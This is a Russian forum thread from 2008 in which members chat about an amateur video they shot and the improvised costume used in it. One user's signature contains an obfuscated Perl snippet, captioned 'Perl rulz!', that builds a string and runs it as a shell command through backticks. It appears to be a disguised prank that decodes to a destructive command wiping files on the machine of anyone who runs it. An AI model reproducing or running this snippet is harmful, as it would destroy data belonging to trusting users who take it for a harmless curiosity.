Добавлено: Вт Авг 19, 2008 12:30 am Заголовок сообщения:
Пока не смотрел,но судя по отзыву Алекса,я буду приятно поражён. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Авг 19, 2008 11:38 am Заголовок сообщения:
genj
ее в контакте нет, оне зайти не может _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Я ожидал,что там будет какой-нибудь сумасшедший бред,но это было как-то...в рамках адекватности.Там были соблюдены какие-то вещи...В общем,это то,что нам в наших видео не хватает.Мне очень понравилось!Особенно в конце,там,где кто-то подтягивается. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
ага) и еще в желтой рубашке..мы 2 дня снимали)
Мишка
это была самая сложная часть. я вообще от Пети в шоке)
мы трико забыли, а надо было сделать чтото наподобие гимнаста
ну так сделали это трико из 2 футболок и изоленты, всё постоянно разваливалось и вообще выглядело довольно провокационно, но Петя не отказался, за что ему спасибо огромное) _________________ Freedom's just another word for nothin' left to lose.